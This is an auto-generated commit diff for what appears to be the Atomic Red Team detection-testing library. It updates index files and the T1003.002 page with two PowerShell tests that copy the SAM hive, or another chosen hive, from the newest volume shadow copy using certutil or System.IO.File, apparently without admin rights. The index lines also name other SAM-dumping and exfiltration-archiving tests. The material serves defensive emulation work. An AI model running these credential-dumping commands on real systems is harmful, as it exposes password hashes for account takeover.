Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -76,7 +76,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
-credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -52,7 +52,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
-credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
 collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -122,7 +122,8 @@
   - Atomic Test #2: Registry parse with pypykatz [windows]
   - Atomic Test #3: esentutl.exe SAM copy [windows]
   - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
-  - Atomic Test #5: dump volume shadow copy hive with certutil [windows]
+  - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
+  - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -90,7 +90,8 @@
   - Atomic Test #2: Registry parse with pypykatz [windows]
   - Atomic Test #3: esentutl.exe SAM copy [windows]
   - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
-  - Atomic Test #5: dump volume shadow copy hive with certutil [windows]
+  - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
+  - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/index.yaml

@@ -5440,19 +5440,23 @@ credential-access:
           Invoke-PowerDump
         name: powershell
         elevation_required: true
-    - name: dump volume shadow copy hive with certutil
+    - name: dump volume shadow copy hives with certutil
       auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
       description: |
-        Dump the SAM hive from volume shadow copies with the certutil utility
+        Dump hives from volume shadow copies with the certutil utility
         This can be done with a non-admin user account
       supported_platforms:
       - windows
       input_arguments:
-        file_path:
+        dump_path:
           description: Path where the hive will be dumped
           type: Path
           default: "$ENV:temp"
-        file_name:
+        target_hive:
+          description: Hive you wish to dump
+          type: String
+          default: SAM
+        dumped_hive:
           description: Name of the dumped hive
           type: String
           default: myhive
@@ -5462,13 +5466,48 @@ credential-access:
           $shadowlist = get-wmiobject win32_shadowcopy
           $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
           $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
-          $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
-          certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+          $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+          certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
         name: powershell
         elevation_required: false
         cleanup_command: |
           write-host ""
-          $toremove = #{file_path} + "\" + '#{file_name}'
+          $toremove = #{dump_path} + "\" + '#{dumped_hive}'
+          rm $toremove
+    - name: dump volume shadow copy hives with System.IO.File
+      auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+      description: 'Dump hives from volume shadow copies with System.IO.File
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        dump_path:
+          description: Path where the hive will be dumped
+          type: Path
+          default: "$ENV:temp"
+        target_hive:
+          description: Hive you wish to dump
+          type: String
+          default: SAM
+        dumped_hive:
+          description: Name of the dumped hive
+          type: String
+          default: myhive
+      executor:
+        command: |
+          write-host ""
+          $shadowlist = get-wmiobject win32_shadowcopy
+          $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+          $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+          $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+          $mydump = #{dump_path} + '\' + '#{dumped_hive}'
+          [System.IO.File]::Copy($shadowpath , $mydump)
+        name: powershell
+        elevation_required: false
+        cleanup_command: |-
+          write-host ""
+          $toremove = #{dump_path} + "\" + '#{dumped_hive}'
           rm $toremove
   T1555.002:
     technique:

atomics/T1003.002/T1003.002.md

@@ -32,7 +32,9 @@ Notes:
 
 - [Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames](#atomic-test-4---powerdump-registry-dump-of-sam-for-hashes-and-usernames)
 
-- [Atomic Test #5 - dump volume shadow copy hive with certutil](#atomic-test-5---dump-volume-shadow-copy-hive-with-certutil)
+- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
+
+- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
 
 
 <br/>
@@ -209,8 +211,8 @@ Invoke-PowerDump
 <br/>
 <br/>
 
-## Atomic Test #5 - dump volume shadow copy hive with certutil
-Dump the SAM hive from volume shadow copies with the certutil utility
+## Atomic Test #5 - dump volume shadow copy hives with certutil
+Dump hives from volume shadow copies with the certutil utility
 This can be done with a non-admin user account
 
 **Supported Platforms:** Windows
@@ -225,8 +227,9 @@ This can be done with a non-admin user account
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| file_path | Path where the hive will be dumped | Path | $ENV:temp|
-| file_name | Name of the dumped hive | String | myhive|
+| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
+| target_hive | Hive you wish to dump | String | SAM|
+| dumped_hive | Name of the dumped hive | String | myhive|
 
 
 #### Attack Commands: Run with `powershell`! 
@@ -237,14 +240,61 @@ write-host ""
 $shadowlist = get-wmiobject win32_shadowcopy
 $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
 $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
-$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
-certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
 ```
 
 #### Cleanup Commands:
 ```powershell
 write-host ""
-$toremove = #{file_path} + "\" + '#{file_name}'
+$toremove = #{dump_path} + "\" + '#{dumped_hive}'
+rm $toremove
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
+Dump hives from volume shadow copies with System.IO.File
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
+| target_hive | Hive you wish to dump | String | SAM|
+| dumped_hive | Name of the dumped hive | String | myhive|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+write-host ""
+$shadowlist = get-wmiobject win32_shadowcopy
+$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+$mydump = #{dump_path} + '\' + '#{dumped_hive}'
+[System.IO.File]::Copy($shadowpath , $mydump)
+```
+
+#### Cleanup Commands:
+```powershell
+write-host ""
+$toremove = #{dump_path} + "\" + '#{dumped_hive}'
 rm $toremove
 ```